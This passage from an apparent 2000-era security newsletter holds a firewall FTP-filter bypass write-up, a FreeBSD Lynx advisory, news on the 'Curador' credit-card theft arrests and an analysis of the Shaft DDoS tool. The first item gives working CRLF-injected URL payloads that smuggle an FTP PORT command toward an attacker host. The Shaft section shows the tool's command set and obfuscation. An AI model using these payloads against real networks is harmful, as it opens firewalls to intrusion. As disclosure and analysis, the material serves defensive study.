internal users fooling a firewall to let them out isn't new, but the scope of this vulnerability is "new" IMHO. Basically, you can get at anyone with a browser or HTML-enabled mail reader protected by firewalls that have more than 50% market coverage. That's bad. What about Checkpoint's FTP PASV fix for FW-1? Checkpoint's fix for FW-1 is to make sure that every packet in the command stream ends with CRLF (0x0a 0x0d in hex). That would help against the above attack, but not if we modify it a wee bit: src="ftp://ftp.rooted.com/aaaaaaa%0a%0dPORT 1,2,3,4,0,139" Ouch. This WILL work in Netscape v4.7 (I've verified it using a network sniffer, anyone care for a packet dump?). The firewall will see this as two separate commands: RETR aaaaaaaaaa PORT 1,2,3,4,0,139 which means that poorly implemented proxies are likely to be vulnerable aswell. This in and of itself is a browser bug IMHO. Line feeds are not valid characters in a file name. Added: 2000-03-14 Apparently, this CRLF variant will _not_ work in MSIE (version unknown?). It's doing the right thing: stripping out the CRLF. (Second hand info, I have not verified MSIE's behaviour) No information on other browsers or mail readers. Other fixes? I havent seen other firewall vendors make public claims that they protect against any of these attacks. Cisco is apparently working on a fix for PIX, but it's taking time, so I'm guessing they're doing it the right way - since doing it the right way really does take quite a bit of time. It would seem like all the others are silently going to sneak fixes into their upcoming updates and pretend like they never were vulnerable in the first place. Grumble. Added: 2000-03-14 I suspect that FW-1's security servers may disable this attack. (Dunno, I'm not an FW-1 user) What firewalls are likely to be vulnerable? This specific attack is likely to work against most "stateful inspection" firewalls with poorly implemented application layer filters. This probably includes most products out there. It may also affect poorly implemented "proxies" when the CRLF is added before the PORT command as described above. Added: 2000-03-14 Checkpoint FW-1 v3 is likely to allow connections on most ports 1024-65535 with full bidirectional communication Checkpoint FW-1 v4 is likely to allow connection on most ports 1024-65535 with only unidirectional communication Cisco PIX is likely to allow connections to any port with full bidirectional communication Linux's ip_masq_ftp module is _really_ easy to fool, according to Solar Designer. It will accept a "PORT" command anywhere in a packet. This means that even this is likely to work: "http://rooted.com:21/PORT 1,2,3,4,0,139" This is likely NOT a complete list. And no, I'm not going to get in touch with vendors and report the vulnerability. There are just too many that are likely to be affected. "The great picture" Other protocols than FTP are likely to be affected by this type of vulnerability - pretty much any protocol that opens up ephereal ports after the initial command session. A couple that come to mind are: * Oracle SQL*Net (versions using separate data channels) * RealAudio/Video (secondary UDP channel) * H.323 (NetMeeting et al) THIS IS NOT A COMPLETE LIST. Those were just a couple of common ones off the top of my head. Workarounds to this specific vulnerability * Disable active FTP. Errrr, wait. The fix for the server side vulnerability was to disable passive FTP. Let's rephrase that: * Disable FTP altogether. Block port 21. Disable FTP Application Layer Filters on all ports in your firewall. * If you can't change the settings in your firewall, set the "FTP Proxy" setting in your browser/HTML-enabled mail reader to some address that doesn't exist, like 127.0.0.2. After this change, your browser won't be able to connect anywhere using FTP. (From Solar Designer: This does not help if you're using ip_masq_ftp, since it'll be fooled by HTTP looking like FTP.) @HWA 109.0 FreeBSD-SA-00:08: Lynx overflows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by FProphet Source: Bugtraq Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com Date: Wed, 15 Mar 2000 09:34:43 -0800 Reply-To: security-officer@freebsd.org Sender: Bugtraq List Comments: RFC822 error: FROM field duplicated. Last occurrence was retained. From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:08 Security Advisory FreeBSD, Inc. Topic: Lynx ports contain numerous buffer overflows Category: ports Module: lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current Announced: 2000-03-15 Affects: Ports collection before the correction date. Corrected: See below. FreeBSD only: NO I. Background Lynx is a popular text-mode WWW browser, available in several versions including SSL support and Japanese language localization. II. Problem Description The lynx software is written in a very insecure style and contains numerous potential and several proven security vulnerabilities (publicized on the BugTraq mailing list) exploitable by a malicious server. The lynx ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 3100 third-party applications in a ready-to-install format. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact A malicious server which is visited by a user with the lynx browser can exploit the browser security holes in order to execute arbitrary code as the local user. If you have not chosen to install any of the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then your system is not vulnerable. IV. Workaround Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you you have installed them. V. Solution Unfortunately, there is no simple fix to the security problems with the lynx code: it will require a full review by the lynx development team and recoding of the affected sections with a more security-conscious attitude. In the meantime, there are two other text-mode WWW browsers available in FreeBSD ports: www/w3m (also available in www/w3m-ssl for an SSL-enabled version, and japanese/w3m for Japanese-localization) and www/links. Note that the FreeBSD Security Officer does not make any recommendation about the security of these two browsers - in particular, they both appear to contain potential security risks, and a full audit has not been performed, but at present no proven security holes are known. User beware - please watch for future security advisories which will publicize any such vulnerabilities discovered in these ports. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOM/JklUuHi5z0oilAQEbzQP+K5HbTRk40fmb+pKOcUDD/r4ofcrkWtXn Ya7PT/ALXvUnohm/jqKofNk9cXK1EspbgHb9N1OJZEzcYUAy378WpQgWh4uxKQa7 +541CwFPPIbWfJQJCOaUODN2qwnXdqXMj6noCKRMN0c3tBRG6R2zEfVaM1vMNS1+ +vcp5WAqDu4= =dtMU -----END PGP SIGNATURE----- @HWA 110.0 Curador? BUSTED ~~~~~~~~~~~~~~~ Contributed by Abattis (Wired) and MerXor (MSNBC) Follow-ups by Cruci. (MSNBC) more from HNN in section 119.0 -=- Sources: Wired, MSNBC http://www.wired.com/news/business/0,1367,35186,00.html Alleged Hackers Arrested Reuters 2:05 p.m. Mar. 24, 2000 PST The FBI said Friday that two 18-year-olds had been arrested in Wales for allegedly hacking into nine e-commerce websites around the world and stealing credit card information. The losses connected with the intrusions on websites in the United States, Canada, Thailand, Japan, and Britain could exceed US$3 million, the FBI said in a news release. It said the theft of credit card information related to more than 26,000 accounts, the alleged scheme involved the disclosure of the data on the Internet, and that the accused hackers used the screen name "Curador." The two youths, who cannot be identified under British law, were arrested Thursday by the Dyfed-Powys Police Service in Wales for violating Britain's Computer Misuse Act, the FBI said. The arrests stemmed from an FBI investigation conducted with the Welsh police, the Royal Canadian Mounted Police, and Internet security consultants, the FBI said, adding that the international banking and credit card industry also provided substantial cooperation. The FBI still is investigating last month's wave of cyber attacks that disrupted some of the Internet's most popular sites. The FBI has yet to make any arrests or bring any charges involving those attacks. The FBI's own website was attacked March 14, the same day the agency celebrated the 50th anniversary of its "Ten Most Wanted Fugitives" list, which is publicized on the site, FBI officials said. -=- MSNBC; http://www.msnbc.com/news/386402.asp Consultant was key to ‘Curador’ bust The FBI crowed, but security specialist led police to Wales By Mike Brunker MSNBC March 27 — While the FBI was quick to take credit for the arrest last week of two teen-agers who allegedly stole information on 26,000 credit cards from Internet retailers, a Canadian computer security consultant working with British authorities tracked the suspects back to their small village in Wales before the U.S. agency even got involved, MSNBC.com has learned. A PRESS RELEASE issued Friday by the FBI said the arrests of the two 18-year-olds .came as a direct result of an FBI investigation.. It added that unidentified Internet security consultants had assisted in the case, but nowhere did it mention Chris Davis of HeXedit Network Security Inc. of Ottawa, Ontario, who worked for nearly two months assembling the evidence that led authorities to the suspects. In interviews with numerous news organizations, including MSNBC.com, after the announcement, the FBI’s Michael Vatis said the arrests should serve as a warning to others who would use the Internet to steal. .It’s important to say that anyone who underestimates the skill of our agents ... does so at their own peril,. he said. FBI PLAYED LIMITED ROLE But interviews with Davis and other participants in the case show that the FBI’s role in the investigation of .Curador. was limited. .They (the FBI) did get involved fairly late,. Davis said Monday. .By the time they got involved, (British police) had phone numbers, home addresses and all that.. Phone calls to the National Infrastructure Protection Center, which Vatis heads, were not returned Monday. A spokesman for the FBI declined to comment. .In anything like this, it really doesn’t serve any purpose to go back and try to heap credit one way or the other,. said the spokesman, Paul Bresson. .I think the facts speak for themselves.. But officials of Promobility.net, a wireless phone seller in Ontario that was among the sites hit by .Curador,. confirmed Davis’ account. .That is 100 percent accurate,. spokesman Eric Geiler said. .He could have knocked on [the suspects’] doors two weeks before the FBI did.. Davis, who has been a computer security consultant for nearly four years, said he got involved in the case in early February after reading a boastful post from .Curador. — the online alias that authorities say was jointly used by the two 18-year-old suspects — on HackerNews.com about the theft of credit card information from two e-merchants. The credit card information was subsequently posted on a Web site by .Curador,. who said he took the action to publicize the lack of security at many e-commerce sites. ‘THAT’S PRETTY LOW’ .I read the boast and I thought, ‘That’s pretty low,’. said Davis. .I checked and both sites seemed like fairly small mom-and-pop type operations and I felt sorry for them. So I fired off an e-mail and said and said, ‘I’ll help you secure your site.’ They wrote back and said they had no idea they’d even been hit (by hackers).. Both Promobility.net and Ltamedia.com, a Knoxville, Tenn., seller of .life-enhancing products,. agreed to turn over their computer logs to Davis so he could determine how the intruders had gained entry to their systems and close the security holes. Looking through the logs, Davis discovered that the intrusions were accomplished using two known security holes in Microsoft’s Internet Information Server, or IIS. While Microsoft had issued .patches. to correct the holes months earlier, none of the nine Web sites in the United States, Canada, Thailand, Japan and the United Kingdom that were hit by .Curador. had updated their software to eliminate the problem. (Microsoft is a partner in MSNBC.com.) While he could have simply fixed the flaws and returned to his paying jobs, Davis found himself growing increasingly fascinated by the case and pressed on. By analyzing e-mail sent through a free service that the hackers wrongly thought would shield the IP address, Davis was quickly able to determine that .Curador. was using an Internet service provider in England. He then contacted Scotland Yard, which referred him to police in South Yorkshire, who determined from records obtained from the ISP that the .crackers. the term for computer criminals preferred by law-abiding hackers were in Wales. SEARCH NARROWS TO TWO HOUSES Soon, the British investigators tightened the circle to the tiny fishing village of Clynderwen, population 500, and ultimately to two houses in the village. It was then, Davis said, that he heard from the FBI, which learned from the Royal Canadian Mounted Police that he was working on the case while investigating the thefts from U.S. Web sites. .They were able to quickly obtain logs from everybody who had been affected in the U.S. and I explained how ‘Curador’ had broken in, showing them, ‘Here’s the line from the log, here’s how he exploited the security vulnerability.’. The FBI, working with the RCMP and the Welsh Dyfed-Powys Police Service, orchestrated the arrests on Thursday of the 18-year-old suspects. The teenagers were questioned for 12 hours after their arrest before being released on bail as the investigation continues, Welsh police said Monday. In accordance with British law, neither of the suspects was publicly identified. But one, Raphael Gray, has given numerous interviews since his release to say that he had acted only to highlight the lack of security on many retail Web sites. .I have done the honest thing, but I have been ignored,. he was quoted as saying by the Sunday Telegraph of London. .That’s why I posted the information on the Internet.. CURADOR’S CLAIMS Authorities have not identified the nine e-commerce sites they say were burgled, but according to .Curador’s. Web sites others include Feelgood Falls; Sales Gate; Shopping Thailand; Vision Computers; NTD Media and the American Society of Clinical Pathologists. Gray has maintained in interviews since his arrest that neither he nor his friend had used the stolen credit card data for personal gain — an assertion backed up by a British businessman who said he hired Gray to run his e-commerce site. .I’d have to give him money to buy lunch or get a haircut,. the businessman told MSNBC.com on Monday. The businessman, who contacted MSNBC.com, agreed to talk about Gray on the condition that neither he nor his Web site be identified because he feared it would be bad for business. His account could not be independently confirmed, but his description of Gray was consistent with other published accounts. The businessman said Gray worked part-time for him for two to three months and was in charge of the company’s Web site, which sells video games. He was fired on March 2 because of chronic absenteeism, he said. ‘HE KNEW HIS STUFF’ .He was very good at his job,. said the man. .Didn’t turn up very often and his personal hygiene wasn’t too good, but he knew his stuff. .He worked developing my company’s e-commerce site, which he claimed was going to be the most secure in the business. What I didn’t realize was that I had one of the world’s biggest credit card hackers looking after my customers.. Meanwhile, a claim by Gray that a credit card belonging to Microsoft founder Bill Gates was among the credit cards he and his friend are accused of stealing was determined to be false on Monday. Gray told the Sunday Telegraph that he had sent information on a number of the cards, including Gates’ card, to a U.S. Web site registered to NBC. (NBC is a partner in MSNBC.com.) But examination of one of the Web sites posted by .Curador. showed an entry about William F. Gates. The Microsoft founder’s name is William H. Gates. The credit card number listed also had too few digits to be valid, and both Microsoft’s address and Gates’ e-mail address were incorrect. Gray and his friend could face charges under Britain’s Computer Misuse Act of 1990. They also could eventually be extradited to face charges in the United States, the FBI’s Vatis told MSNBC.com on Friday. .The primary consideration is what’s in the interest of justice,. said Vatis. .... We have obviously been investigating violations of U.S. federal criminal law.. The teens are alleged to have caused losses that Vatis said could amount to more than $3 million, based on the cost of canceling the 26,000 credit card accounts and issuing new cards. And Vatis said that was .just one measure of possible loss.. Other costs could arise from any fraudulent use of the credit card numbers, as well as the expense of repairing compromised Web sites, he said. Live Map: Clynderwen The arrests in Wales appear to represent the first major international response to a rapidly growing field in computer crime. Earlier this month, in response to an MSNBC.com investigation of international online credit card theft, spokesmen for the FBI and other organizations involved in fighting cybercrime said they could not recall any past prosecutions in such matters. On Friday, Vatis said he could easily think of .international hacking incidents. that have led to prosecutions, but not in the context of online credit card information. Many such cases are under investigation, he said. Vatis said the international hurdles to investigating Internet crime were not as high as some people might think, contending that the FBI was .building more and more bridges every day. with law enforcement agencies in other countries. -=- MSNBC supplimentary; March 24th Can hackers kill credit cards? Spate of e-commerce intrusions might mean a new form of payment system will come sooner than expected By Bob Sullivan MSNBC March 24 — He calls himself .The Saint of E-commerce.. Two months ago, .Curador. started posting his catalog of stolen credit card numbers on his Web page. He stole database after database from a variety of e-commerce sites, each time updating his site, then gleefully mailing notification to reporters. He topped 25,000 records from 13 Web sites. Despite all that the financial risk and all that violation of personal privacy, no one could stop him. But now authorities in Wales have arrested two 18-year-olds on charges related to the Curador thefts. AUTHORITIES, OF COURSE, had always removed Curador’s Web site — at least a dozen times. No matter; he used the many free, anonymous Web hosting services available on the Internet. And as fast as his Web page is taken down, .Curador. would put up another one. The 18-year-old computer intruder, who also goes by the nickname .mind gimp,. told MSNBC in a telephone interview only that he was located somewhere in Europe. He wasn’t using the credit cards for financial gain, he said The self-proclaimed .Saint of E-commerce. said he simply wanted to embarrass the victim Web sites into employing better security. He promised to continue breaking into e-commerce sites and posting stolen numbers .until I don’t need to do it anymore or until I get arrested.. But until Thursday, as MSNBC’s Mike Brunker reported earlier this month, there hadn’t been a single reported arrest of a foreign credit card thief by U.S. authorities. Curador’s thefts are just another story in this year’s litany of tales surrounding online theft of personal and financial information. E-merchants are furiously fighting the battle to keep down fraud costs, and consumer confidence in Internet safety is continually shaken, with no apparent end in sight. So some experts think Curador may just be another nail in the coffin of a credit card system that was hardly designed for Internet purchasing. .Anyone who’s serious about this is getting a lesson. The wake-up call is here. The time is now,. said Stephen Orfei, vice president of electronic commerce and emerging technology for MasterCard International. Orfei is also the spokesperson for SETCo, the Visa- and MasterCard-backed organization pushing SET, a new payments protocol designed to limit electronic fraud. ‘HOW CAN WE DO MORE?’ The raging success of online thieves, some say, will force the hand of banks, merchants, credit card companies and consumers to change the way we spend money much sooner than we intended. The high-profile hacks have at least gotten the attention of merchants, said Alyxia Do, electronic payment and smart card analyst with Frost & Sullivan. .It seems that there have been a greater number of queries coming in,. she said. .It began with the CD Universe break-in and it has just continued to be in the news. I have heard more and more merchants are going back to Visa and MasterCard and asking, ‘How can we do more?’ . The stakes are higher for merchants than consumers. While consumers face a limited liability of $50 and a paperwork hassle, online merchants must write off credit card theft as .acceptable loss.. Hard data on how bad losses are is impossible to find, but anecdotally some industries relate fraud rates as high as 40 percent. Merchants use inexact software to filter out potential fraudulent purchases, but that means they turn away legitimate sales, too. The mathematics are alarming. In fact, according to Joe Barrett, chairman of the Internet Fraud prevention Advisory Council, in some industries, merchants are turning away 20 percent of proposed sales. .You’re killing your business. You’d be better off taking every sale and self-insuring,. he said. SMART CARDS, FINALLY? "A number and a date and you can buy anything you want with it.. That’s how a teen-aged Internet credit card thief described to MSNBC the fundamental problem of using credit cards online. The familiar plastic currency was designed to be physically handed to merchants, who could at least make a cursory check to see if signatures on the card and the sales slip matched. Online, commerce is anonymous. There is no way to see who’s entering the credit card numbers into the Web page, an anonymity that heavily favors the fraud artists. Several technologies hope to tip the scales against thieves by implementing systems that require some real-world physical component when shopping online. Smart cards, the generic term for any plastic which includes an embedded microchip, are one promising solution. Smart cards, which identify the user through encrypted information embedded on the chip, must be inserted into a .card reader. attached to the computer. That means the card can’t be used for e-commerce unless the purchaser is currently holding it. A PIN number is also required, so a thief needs to physically have the card and a security code in order to use it. That’s not an insurmountable hurdle, but a far more difficult one than using .a number and a date.. Still, smart cards are 20 years old, and while there have been smatterings of adoption in Europe, trials of the technology in the U.S. have failed repeatedly. Consumers perceived them as inconvenient, and in the past they have been unmoved by the improvement in security. .In those trials, people still needed to carry around spare change anyway,. said Don Davis, editor of Card Technology Magazine. .They didn’t really solve a problem for people. Now with the Internet, that changes things. There is a real problem to be solved with smart cards.. And there appears to finally be momentum behind the chip-enabled cards. Microsoft and Sun are currently battling over the operating system used to run the cards, and Windows 2000 includes native support for the technology. But perhaps the biggest leap forward came last year, when American Express announced .Blue,. the first widely distributed smart card in the United States. Blue is a hybrid; it still has the old-fashioned magnetic strip and can be used as a traditional credit card. But the embedded chip can be used for online purchases, and it also can be updated with new software. Part of the fresh promise for smart cards comes from the changing economics in the industry. Card readers, which must be connected to every PC if smart cards are to be used, are now cheap enough to be given away. That’s exactly what American Express decided to do when it launched .Blue. last year. .We see a lot of promise to the technology. There is a real customer need out there,. said Molly Fause, American Express spokesperson. BABY STEPS Still, .Blue. is just a toe in the water. Currently, the chip only adds convenience — it lets cardholders open a .digital wallet,. including billing information, with a single swipe. But it is not used by merchants to positively identify consumers; instead, the old-fashioned number is used, and it can be stolen and exploited just like traditional cards. And that’s been the problem for smart cards all along — while European governments and institutions have aggressively supported the technology (for example, Germany has distributed 80 million cards to all users in its health care system), U.S. companies have taken baby steps. Davis points out that U.S. adoption is still likely to be among the slowest in the world. With aggressive initiatives in France and Germany already, he said most of Europe will have converted to smart cards by 2005, with major Latin American countries following soon after. Still, the American Express initiative, while tepid, is important. The company wouldn’t say how many Blue cards have been issued; Faust would only say the company has received twice as many applications as anticipated. Analyst Do said she experts 1.5 million Blue cards to be in consumers’ hands by year’s end. .Believe me, the rest of the issuers in the U.S. are closely following what American Express is doing,. he said. The real goal, he said, is to ply consumers with coupons and loyalty points they can download onto smart cards, which will make them an attractive proposition. .If American Express figures that out, the rest of the industry will react quickly.. Still, getting Internet users to add hardware to their existing systems is a tremendous challenge. Davis speculates that many Blue owners don’t bother to hook up the card reader, for example. And Do goes farther, suggesting that the need to add a card reader makes smart cards a non-starter in the consumer space. But others say the shift will be swift, once consumers are convinced about the benefits of smart cards. .The last paradigm shift I would liken this to is the mouse,. said Rick McNeef, vice president of corporate development at Cybersafe Inc. .How long did it take us to get a mouse in conjunction with every keyboard?. He also thinks credit cards have built-in obsolescence, since they all have an expiration date, and most of our renewal cards will have chips inside. .Whatever you have in your wallet right now, the expiration date is three years or less. There’s an automatic replacement anyway.. SET MAKES A COMEBACK Additional hardware isn’t the only available method for proving someone is who they say they are on the Internet. The SET (secure electronic transactions) protocol accomplishes that goal through software. In SET, each customer receives a unique digital certificate, the cyberworld equivalent of a real-life signature. The certificate is .wrapped. around each transaction, and unwrapped by banks at the other end — no more anonymous commerce. .It transposes the physical world model into cyberspace,. said Orfie, speaking on behalf of SETCo. With each transaction, the consumer and the merchant must prove they are who they say they are, using the special SET digital authentication. That gives the bank an .irrefutable audit trail,. meaning criminals could be traced. More important, it satisfies the bank’s requirement for a signature on each transaction, meaning merchants won’t receive those fraud chargebacks that are currently a part of doing business online. But SET, like smart cards, has been slow to get off the ground. First tested in 1996, the standard appeared to be dead in the water last year. The SETCo.org Web site lists only about 25 participating merchants. The extra decryption processes proved slow and cumbersome; standards weren’t set, and big e-commerce companies went with the now-familiar .SLL. instead. The fear when e-commerce was first introduced was that ingenious card thieves would listen in on data being slung around the Internet and pick off credit card information as it went by, much like a wire tap. So, much attention was given to Secure Socket Layer, or SSL, technology, which encrypts the information while it’s in transit. But SSL says nothing about who’s at either end of the transaction. And unfortunately, cyber-eavesdropping has turned out to be a non-issue. The problems begin when the card number arrives at the merchant, who decrypts it. But the recent surge of high-profile credit card thefts, SET and its authentication capabilities are getting a new life, some say. . MSNBC research .We’ve anticipated this problem, which is now rearing its ugly little head,. Orfie said. .We’re saying we have a solution.. Since SET requires a much less costly infrastructure upgrade, it may be the biggest benefactor from the slew of hack attacks, Analyst Do said. .It’s getting up and dusting itself off and starting to walk again,. she said. .Online hacking will definitely promote some kind of network security rather than smart cards.. STORES AREN’T BANKS With either a hardware or a software solution, most experts say that one fundamental change to the current payments system is required. Today, merchants are forced to act like banks. They are acquiring and storing personal financial records — namely, credit cards. SET and any of the various smart card proposals can take this banking role away from retailers. In these new systems, consumers who hit .submit. on a Web site can send their purchase request to their own bank. Their bank then gives the money to the e-commerce store, along with some kind of unique identifying information. But personal bank account numbers, or credit card numbers, are never sent to the Web site. .The best place for the card to be is to remain in the banking system,. said Gerry Gay, vice president of sales and marketing at SafeTpay.com, Inc. His company recently launched a numeric keypad/card reader that acts like a mini-ATM when attached to a personal computer. The card reader immediately encrypts PIN numbers and card numbers and sends the data directly to banks. Merchants only receive their money and a tracking number. .You eliminate another arena where the data can be compromised,. Gay said. .As things are, you’re entrusting your card data to someone who’s outside the payment system.. OLD-FASHIONED BARN RAISING Still, even with the increased impetus supplied by cybercrooks, smart cards or any other payment solution won’t take over overnight. Old habits — at banks, merchants, and among consumers — die hard. Even if those old habits are costly. .The devil you know is better than the devil you don’t know,. Gay said, describing his company’s challenge in convincing banks and merchants to support his system. But no fright over fraud can overcome the challenges of an upgrade — in the case of smart cards, Analyst Do thinks a complete overhaul of the system will require $15 billion. Combine that with the fundamental change either SET or smart cards would hoist on consumers, and you have some formidable obstacles. That makes Barrett, of the Internet Fraud Prevention Advisory Council, leery. .A lot of these things create issues for consumers. They’re moving the pain onto consumers and taking it away from merchants, and that’s not going to work,. said Barrett, also an executive at Vitessa Corp., an online payment company. That’s why he thinks a very low-tech solution is needed to deal with credit card crooks. If Barrett had his way, companies like Amazon.com would open up their internal fraud databases to all e-merchants. Such an open policy would quickly create a list of suspicious e-mail addresses, Internet Service providers, and of course, credit card numbers. .I try to encourage people to think about fraud detection as a public good,. he said. The proposal has so far fallen on deaf ears, as most merchants see their fraud data as top-secret proprietary information. .Merchants on the Internet have tendency to want to wall off and control and not share their kownledge or incidents of fraud. .Amazon doesn’t compete as a fraud detection company. In so doing what they’re doing is hoarding information … If you live in a dangerous neighborhood, are you safe if you buy weapons? No. You still haven’t cleaned up the neighborhood. If the top 100 merchants on the Net put in place a technology that they could demonstrate immediately it’s hard for hackers, that would clean up the neighborhood.. His proposal is not so far, surprisingly, from the community-based solution proposed by the Saint of E-Commerce. .There should be an Internet Bureau of Commerce that can list every single person on the Internet who accepts credit cards and people should be invited to try to break in,. Curador said. .And if you can, then they are listed as unsafe.. Such lists already exist — but they are shared only among members of the Internet underground, and like Curador’s notorious Web page, come and go under cover of Internet anonymity. That means, for now, the bad guys appear to be much better at sharing information than the good guys. And while next-generation payment systems continue to languish in trials, criminals continue to order anything they want .with a number and a date.. @HWA 111.0 PSS: Shaft Distributed DoS tool analysis Sven Dietrich ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Packetstorm Security http://packetstorm.securify.com/ UNFORMATTED = AS IS, WARNING C=SOURCE INCLUDED - Ed ================================================================================ An analysis of the ``Shaft'' distributed denial of service tool ================================================================================ Sven Dietrich NASA Goddard Space Flight Center Neil Long Oxford University David Dittrich University of Washington Copyright 2000. All rights reserved. March 13, 2000 -- 1. Introduction ------------------ This is an analysis of the "Shaft" distributed denial of service (DDoS) tool. Denial of service is a technique to deny access to a resource by overloading it, such as packet flooding in the network context. Denial of service tools have existed for a while, whereas distributed variants are relatively recent. The distributed nature adds the "many to one" relationship. Throughout this analysis, most actual host names have been modified or removed. -- 2. Historical overview ------------------------- "Shaft" belongs in the family of tools discussed earlier, such as Trinoo, TFN, Stacheldraht, and TFN2K. Like in those tools, there are handler (or master) and agent programs. The general concepts of these tools can be found in a Distributed Intruder Tools Workshop Report held in November 1999 at the Computer Emergency Response Team Coordination Center (CERT/CC) in Pittsburgh, Pennsylvania: http://www.cert.org/reports/dsit_workshop.pdf In chronological order, there are Trinoo, TFN, Stacheldraht, Shaft, and TFN2K. Trinoo, TFN, and Stacheldraht were analyzed in [5], [6], and [7] respectively. TFN2K was recently analyzed in [1]. In the first two months of 2000, DDoS attacks against major Internet sites (such as CNN, ZDNet, Amazon etc.) have brought these tools further into the limelight. There are a few papers covering DDoS to be found at: http://packetstorm.securify.com/distributed/ http://staff.washington.edu/dittrich/misc/ddos/ http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html -- 3. Analysis -------------- Shaftnode was recovered, initially in binary form, in late November 1999, then in source form for the agent. Distinctive features are the ability to switch handler servers and handler ports on the fly, making detection by intrusion detection tools difficult from that perspective, a "ticket" mechanism to link transactions, and the particular interest in packet statistics. -- 3.1 The network: client(s)-->handler(s)-->agent(s)-->victim(s) ----------------------------------------------------------------- The "Shaft" network is made up of one or more handler programs ("shaftmaster") and a large set of agents ("shaftnode"). The attacker uses a telnet program ("client") to connect to and communicate with the handlers. A "Shaft" network would look like this: +--------+ +--------+ | client | | client | +--------+ +--------+ | | . . . --+------+---------------+------+----------------+-- . . . | | | | | | +-----------+ +-----------+ +-----------+ | handler | | handler | | handler | +-----------+ +-----------+ +-----------+ | | | | | | . . . ---+------+-----+------------+---+--------+------------+-+-- . . . | | | | | | | | | | +-------+ +-------+ +-------+ +-------+ +-------+ | agent | | agent | | agent | | agent | | agent | +-------+ +-------+ +-------+ +-------+ +-------+ -- 3.2 Network Communication ---------------------------- Client to handler(s): 20432/tcp Handler to agent(s): 18753/udp Agent to handler(s): 20433/udp "Shaft" (in the analyzed version, 1.72) is modeled after Trinoo, in that communication between handlers and agents is achieved using the unreliable IP protocol UDP. See Stevens [18] for an extensive discussion of the TCP and UDP protocols. Remote control is via a simple telnet connection to the handler. "Shaft" uses "tickets" for keeping track of its individual agents. Both passwords and ticket numbers have to match for the agent to execute the request. A simple letter-shifting (Caesar cipher, see Schneier [17]) is in use. -- 3.3 Commands --------------- The command structure is divided into the agent and handler command syntax groups. The attacker interacts with the handler via a command line. -- 3.3.1 Agent Command Syntax Accepted by agent and replies generated back to the handler: size Size of the flood packets. Generates a "size" reply. type <0|1|2|3> Type of DoS to run 0 UDP, 1 TCP, 2 UDP/TCP/ICMP, 3 ICMP Generates a "type" reply. time Length of DoS in seconds Generates a "time" reply. own Add victim to list of hosts to perform denial of service on Generates a "owning" reply. end Removes victim from list of hosts (see "own" above) Generates a "done" reply. stat Requests packet statistics from agent Generates a "pktstat" reply. alive Are you alive? Generates a "alive blah" reply. switch Switch the agent to a new handler and handler port Generates a "switching" reply. pktres Request packet results for that host at the end of the flood Generates a "pktres" reply. Sent by agent: new Reporting for duty pktres Packets sents to the host identified by number -- 3.3.2 Handler (shaftmaster) Command Syntax Little is known about the handler, but this is a speculation, pieced together from clues, of how its command structure could look like: mdos Start a distributed denial of service attack (mdos = massive denial of service?) directed at . Sends out "own host" messages to all agents. edos End the above attack on . Sends out "end host" messages to all agents. time Set the duration of the attack. Sends out "time " to all agents. size Set the packetsize for the attack (8K maximum as seen in source). Sends out "size " to all agents. type Set the type of attack, UDP packet flooding, TCP SYN packet flooding, ICMP packet flooding, or all three (here BOTH = ICMP amd IP protocols) Sends "type " to all agents. +node Add new agents -node Remove agents from pool ns Perform a DNS lookup on lnod List all agents ltic List all tickets (transactions?) pkstat Show total packet statistics for agents Sends out "stat" request to all agents. alive Send an "alive" to all agents. A possible argument to alive is "hi" stat show status? switch become the handler for agents Send "switch" to all agents. ver show version exit -- 3.4 Password protection -------------------------- After connecting to the handler using the telnet client, the attacker is prompted with "login:". Too little is known about the handler or its encryption method for logging in. A cleartext connection to the handler port is obviously a weakness. -- 3.5 Detection ---------------- -- 3.5.1 Binaries and their behavior As with previous DDoS tools, the methods used to install the handler/agent will be the same as installing any program on a compromised Unix system, with all the standard options for concealing the programs and files (e.g., use of hidden directories, "root kits", kernel modules, etc.) The reader is referred to Dittrich's Trinoo analysis [5] for a description of possible installation methods of this type of tool. Precautions have been taken to hide the default handler in the binary code. In the analyzed code, the default handler is defined as follows: #define MASTER "23:/33/75/28" which would translate into 129.22.64.17 (electrochem1.echem.cwru.edu) using the same simple cipher mentioned above. Port numbers are munged before actual use, e.g. #define MASTER_PORT 20483 is really port 20433. All these techniques intend to hide the critical information from prying eyes performing forensics on the code. The program itself tries to hide itself as a legitimate Unix process (httpd in the default configuration). Looking at strings in the shaftnode application reveals the following: > strings -n 3 shaftnode pktres switch alive stat end own time type size httpd 23:/33/75/28 Unable to fork. (do it manually) shift new %s size %s %s %s %s type %s %s %s %s time %s %s %s %s owning %s %s %s %s switched %s %s %s done %s %s %s %s pktstat %s %s %s %lu alive %s %s %s blah %d.%d.%d.%d Error sending tcp packet from %s:%i to %lu:%i pktres %s %i %i %lu Upon launch, the "Shaft" agent (the "shaftnode") reports back to its default handler (its "shaftmaster") by sending a "new " command. For the default password of "shift" found in the analyzed code, this would be "tijgu". Therefore a new agent would send out "new tijgu", and all subsequent messages would carry that password in it. Only in one case does the agent shift in the opposite direction for one particular command, e.g. "pktres rghes". It is unclear at the moment whether this is intentional or not. Incoming commands arrive in the format: "command " For most commands, the password and socket/ticket need to have the right magic in order to generate a reply and the command to be executed. Message flow diagram between handler H and agent A: Initial phase: A -> H: "new", f(password) Running loop: H -> A: cmd, f(password), [args], Na, Nb A -> H: cmdrep, f(password), Na, Nb, [args] - f(X) is the Caesar cipher function on X - Na, Nb are numbers (tickets, socket numbers) - cmd, cmdrep are commands and command acknowledgments - args are command arguments The flooding 